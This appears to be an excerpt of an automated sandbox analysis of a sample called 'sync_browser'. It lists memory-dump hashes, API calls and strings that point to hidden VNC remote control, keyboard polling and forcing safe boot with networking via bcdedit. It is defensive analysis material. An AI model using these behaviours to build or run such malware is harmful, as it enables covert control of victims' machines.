                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                    • String ID: UseRegistry$admin$group1
                                                                    • API String ID: 1728753321-252764636
                                                                    • Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                    • Instruction ID: 2dc0d22590bd82420eadeba20d3c11178b24dacef01301587d551903e013d169
                                                                    • Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                    • Instruction Fuzzy Hash: BF11B721A1C986D1EA60FB24F4A17F9A3A1FF98744FC50036D64D467BADE3CF1049B60
                                                                    APIs
                                                                      • Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057CC9
                                                                      • Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722
                                                                      • Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                    • String ID: UseRegistry$admin$group2
                                                                    • API String ID: 1728753321-2518265958
                                                                    • Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                    • Instruction ID: 20e0fb7fe3f1775bab68283bb1a15f7376c4ee519b33488f2c718ce4305a9c43
                                                                    • Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                    • Instruction Fuzzy Hash: 0A11B725A1C946D1EA60FB20F4627F9A361FF98344FC51036DA4D467BADE3CF1059A60
                                                                    APIs
                                                                      • Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057D89
                                                                      • Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722
                                                                      • Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                    • String ID: UseRegistry$admin$group3
                                                                    • API String ID: 1728753321-3776872688
                                                                    • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                    • Instruction ID: 930e548d0799cefe58bb193e560f83572349a2a3629cf7b15df26bf3b7324ec4
                                                                    • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                    • Instruction Fuzzy Hash: 1711B726A1C946D1EA61FB20F4617F9A361FF98344FC50036DA4D467BADE3CF1049A60
                                                                    APIs
                                                                      • Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057E50
                                                                      • Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722
                                                                      • Part of subcall function 00007FF7400577F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057840
                                                                      • Part of subcall function 00007FF7400577F0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005787D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$locdom1
                                                                    • API String ID: 1788981264-2648182776
                                                                    • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                    • Instruction ID: f31c9dc3bae64354fccd623c139b67eab8831f9cbeef772e2d84c245d1e5537f
                                                                    • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                    • Instruction Fuzzy Hash: FC010825A1CA46D1FA21FB24B8917B9A2A1EF5C344FC10035D94D467BADE3CF548DA60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFindMode$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2885216544-0
                                                                    • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction ID: 39ec3355f26b84483c146f67678051aff9c50e081cd6edb8170650ad7c370cb4
                                                                    • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction Fuzzy Hash: EF01693571C741C6DA10AF21B4546B9A361FB4CBE0F804230DEAD437A8CE3DE8458710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv
                                                                    • String ID:
                                                                    • API String ID: 1507349165-0
                                                                    • Opcode ID: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
                                                                    • Instruction ID: 226aeea26984cd616a5f38f013835ab5936d38ebeb876b05c68c689c9bfe5570
                                                                    • Opcode Fuzzy Hash: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
                                                                    • Instruction Fuzzy Hash: 77F0C821B1CA82C2E350BB2A7940665F591BF84BE0F984231EE6943FEDDF7CE4414610
                                                                    APIs
                                                                    • GetKeyboardState.USER32 ref: 00007FF7400231D3
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017509
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017523
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF74001753D
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017557
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF740017571
                                                                      • Part of subcall function 00007FF7400174C0: GetKeyState.USER32 ref: 00007FF74001758B
                                                                      • Part of subcall function 00007FF7400174C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF7400175D6
                                                                      • Part of subcall function 00007FF7400174C0: LeaveCriticalSection.KERNEL32 ref: 00007FF74001760F
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$CriticalSection$EnterKeyboardLeave
                                                                    • String ID:
                                                                    • API String ID: 4104749118-0
                                                                    • Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                    • Instruction ID: d2f7c8f521514da599afb36490118555835b5922f63cefbfe7c70acf9f760ab8
                                                                    • Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                    • Instruction Fuzzy Hash: 35F08961A1C551C1E735B722E8213B6F2A1FF8C744F844135998D096B9DF2CF559CA10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                    • String ID: F
                                                                    • API String ID: 2202639625-1304234792
                                                                    • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction ID: 6fe88ff0af758bb7e6a904e628ac3e5972a06b2106f5be8192167726f33edca3
                                                                    • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction Fuzzy Hash: 5FC13F36A08696CBE790EF65D6489EE73A9FF88744F410436EE0953718DF78E844CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
                                                                    • String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
                                                                    • API String ID: 2560957196-1231019345
                                                                    • Opcode ID: 3f52801594e27f2029a31436942ce8f2131e88a332c03dd00a5becdb50ed7808
                                                                    • Instruction ID: 78b8c98a9ec540ecf07032c100b129e550aaa145a9bceca0790914cbc3ffc11a
                                                                    • Opcode Fuzzy Hash: 3f52801594e27f2029a31436942ce8f2131e88a332c03dd00a5becdb50ed7808
                                                                    • Instruction Fuzzy Hash: 35B13822A1CAC2C5EB64BF65D8406F9A365EF84B84F844036DA0D57BA9CF38F945D360
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDCE1
                                                                    • GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDCFD
                                                                    • EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD0F
                                                                    • GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD26
                                                                    • EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD2F
                                                                    • GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD46
                                                                    • EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD4F
                                                                    • GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD66
                                                                    • EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD6F
                                                                    • GetProcAddress.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD8E
                                                                    • EncodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDD97
                                                                    • DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDDCA
                                                                    • DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDDDA
                                                                    • DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE30
                                                                    • DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE51
                                                                    • DecodePointer.KERNEL32(?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400CDE6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                    • API String ID: 2643518689-564504941
                                                                    • Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                    • Instruction ID: e28d79fcd7e0860aa613e664b56d3dea4dd2e0fb2acfc496d6518719915471a0
                                                                    • Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                    • Instruction Fuzzy Hash: FE51E724A1EB07C1EE59BB15B854578A3A0AF59B80F84003ADC2E4B7B8EF3CF4559730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                                    • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                                    • API String ID: 3746257916-1709497384
                                                                    • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction ID: e54e86a55510e073d61ea65febb78ccc38b8967109f5f5537c14bed3d3d9caa2
                                                                    • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction Fuzzy Hash: 1D713135A19A86D9E710EF64E8406E973A0FB08368F801336EA6D577E9DF3CE115C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
